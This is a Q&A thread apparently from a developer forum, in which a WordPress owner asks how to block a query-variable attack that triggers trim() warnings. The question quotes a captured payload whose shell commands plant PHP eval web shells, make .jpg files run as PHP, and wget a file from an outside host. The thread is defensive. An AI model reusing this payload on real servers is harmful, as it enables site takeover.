# How to Stop This Wordpress Query Attack?

Tags: wordpress, security

My logs started filling up with this warning...

```
Warning: trim() expects parameter 1 to be string, array given in /wp-includes/class-wp-query.php line 756
```

Which is the line

```
 public function parse_query( $query = '' ) {

     ...

     $qv['name']     = trim( $qv['name'] );
```

So to see what's going on I added...

```
    // Debug an attack
    if( !is_string($qv['name']) ) {
        error_log( '$_SERVER[HTTP_REFERER] = ' . $_SERVER['HTTP_REFERER'] );
        error_log(print_r(debug_backtrace(), true));
        exit();
    }

    $qv['name']     = trim( $qv['name'] );
```

I came back to check the logs and seen the array that was getting through here...

```
[query_vars] => Array
  (
    [name] => Array
      (
        [#post_render] => Array
        (
          [0] => passthru
        )

        [#type] => markup
        [#markup] => echo \'Vuln!! patch it Now!\' > vuln.htm; echo \'Vuln!!<?php @eval($_POST[\'pass\']) ?>\'> sites/default/files/vuln.php; echo \'Vuln!!<?php @eval($_POST[\'pass\']) ?>\'> vuln.php; cd sites/default/files/; echo \'AddType application/x-httpd-php .jpg\' > .htaccess; wget \'http://40k.waszmann.de/Deutsch/images/up.php\'
  )
```

As you may have noticed I logged the reffer which turned out to be...

```
 $_SERVER[HTTP_REFERER] = http://www.google.com.hk
```

Which looks like it was spoofed.

**Full call stack dump can be found here: https://paste.ee/p/0Vd49**

How can I prevent this crap from getting through, is there any filters I use to do some checks to stop these calls ?

Thanks!

Comment: First of all, the file which is showing error, is an default Wordpress's file, and we as a developer are never allowed to touch or edit those code. If it's showing error that means, you have made some mistakes in your code. So try to find error on right place.

Comment: Dude is that seriously your comment... "you have made some mistakes in your code" -> how do you know? I don't think you understand what you're looking at here.

Comment: Might be a good idea to [get in touch with the WordPress team](https://make.wordpress.org/core/reports/) to report the issue so they can patch it up. I've been seeing these notices on my logs as well.

Comment: @DaleWoods I am sorry my friend, If I disappoint you, but it was not intentionally. What I meant is, Wordpress have there core files in wp-includes and wp-admin folders. and each version of Wordpress is released after thousands of testing levels and on thousands of free and paid themes so error can't be in the file, which you are reporting as that file is under wp-includes folder. I request you to please share url I will resolve issue, mail me on chintan dot snv at gmail dot com.

Comment: Oh ok, so the wordpress core files are bug free and invincible.

Comment: I believe there is an already opened ticket for this at trac.wordpress.com. My memory is vague about it but I think this is a PHP related problem and not really WP specific. EDIT: Here's the link: https://core.trac.wordpress.org/ticket/17737

Comment: Yeah my searching and tracing through claims of duplicate bugs ended up there too. The original bug was filed 8 years ago, but there seems to be a recent rash of attack attempts to exploit it, prompting the WordPress folks to finally commit to fixing it.

Comment: @LorenRosen I seen it too, did they commit to doing something about it, because I don't know what server setting to change to block this.

Comment: Back in Jan. "Milestone changed from 5.1 to Future Release
Patch need refreshing, testing, review, etc." So my interpretation (and yeah should have read it more carefully) is that it's likely for 5.2 but you're right the word 'committed' is too firm. I don't know if there's a setting you can change per se, but some some online postings I saw via searching on the warning text suggest some small mods to the core can fix it. And yes there's obvious tradeoffs in hacking a fix yourself vs. waiting for the official one.

Comment: As you can see in my code, I just type check the value, and if it is not what it should be I exit... I don't understand why they can't do that :D But it stops a potentially disastrous situation until they patch it.